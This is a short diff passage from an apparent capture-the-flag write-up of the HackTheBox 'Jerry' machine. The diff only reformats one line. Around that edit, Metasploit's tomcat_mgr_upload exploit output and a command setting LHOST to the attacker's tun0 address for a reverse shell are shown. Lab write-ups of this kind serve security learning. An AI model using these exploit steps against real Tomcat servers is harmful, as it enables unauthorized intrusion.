pierretallotte/ctf-writeups/htb-jerry/README.md

 [*] Undeployed at /manager/html/undeploy
 [*] Exploit completed, but no session was created.
 ```
 It is better but not enough.
-Indeed, I forget to configure LHOST:
+Indeed, I forget to configure `LHOST`:
 ```
 [msf](Jobs:0 Agents:0) exploit(multi/http/tomcat_mgr_upload) >> set LHOST tun0
 LHOST => 10.10.14.45